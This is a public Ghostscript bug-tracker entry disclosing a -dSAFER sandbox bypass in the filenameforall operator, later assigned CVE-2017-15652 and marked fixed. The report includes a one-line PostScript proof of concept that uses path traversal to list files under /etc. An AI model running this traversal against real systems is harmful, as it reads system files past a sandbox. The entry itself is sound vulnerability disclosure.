| Summary: | Bypass -dSAFER in filenameforall command | ||
|---|---|---|---|
| Product: | Ghostscript | Reporter: | Jasper Yu <007seadog> |
| Component: | Security (public) | Assignee: | Chris Liddell (chrisl) <chris.liddell> |
| Status: | RESOLVED FIXED | ||
| Severity: | normal | ||
| Priority: | P4 | ||
| Version: | unspecified | ||
| Hardware: | PC | ||
| OS: | Linux | ||
| Customer: | Word Size: | --- | |
| Attachments: | the script run with ghostscript 9.22 | ||
I just requested a CVE number from MITRE, and the following was assigned. Please use this CVE as reference in patching or info dissemination related to this particular issue. CVE-2017-15652 Thanks Fixed in: http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=2fc463d0e Thanks for the report! |
Created attachment 14403 [details] the script run with ghostscript 9.22 CVE-2013-5653 fixed the filenameforall can ignore -dSAFER and list the files. But still, there are some way to bypass it. %!PS (/usr/share/fonts/../../../../../../../../etc/*) {print (\n) print} 1024 string filenameforall quit Is this possible to request a CVE ID?